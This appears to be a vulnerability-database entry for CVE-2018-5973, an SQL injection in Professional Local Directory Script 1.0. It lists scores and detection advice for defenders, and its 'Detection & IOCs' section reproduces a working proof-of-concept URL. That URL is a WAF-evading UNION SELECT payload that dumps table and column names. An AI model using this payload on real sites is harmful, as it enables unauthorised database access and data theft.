CVE-2018-5973
Published: 2018-01-25

Priority: P270 · Severity: critical · CVSS 3.0 base score: 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: EXPLOIT
EPSS: 20.46% (97.2nd percentile)
SQL Injection exists in Professional Local Directory Script 1.0 via the sellers_subcategories.php IndustryID parameter, or the suppliers.php IndustryID or CategoryID parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eihitech | professional_local_directory_script | — | — |
Detection & IOCs (extracted from sources)

- URL (PoC): `http://localhost/[PATH]/sellers_subcategories.php?IndustryID=-105++/*!08888uNiOn*/(/*!08888SelECt*/+0x3078323833313239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--+-`
- Monitor HTTP GET requests to sellers_subcategories.php with an IndustryID parameter containing SQL injection patterns, particularly MySQL versioned comment syntax (`/*!NNNNN...*/`), UNION SELECT constructs, and export_set() function calls.
- Monitor HTTP GET requests to suppliers.php with IndustryID or CategoryID parameters containing SQL injection payloads.
- Detect the MySQL versioned comment obfuscation technique (`/*!08888`) used to bypass WAF/filters in UNION-based SQL injection against these endpoints.
- The payload targets information_schema.columns to enumerate table and column names via export_set(); alert on references to information_schema in query parameters.
- Note: the exploit PoC uses `localhost` as the target host; in real-world attacks the host will vary. Detection rules should focus on the vulnerable script paths and parameter names (IndustryID, CategoryID) rather than the host.
- Note: the `[PATH]` placeholder in the PoC indicates the application may be installed in an arbitrary subdirectory; path-based detections should use a suffix/contains match on the script filenames rather than an exact path.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
No detection rules found.
No writeups or analysis indexed.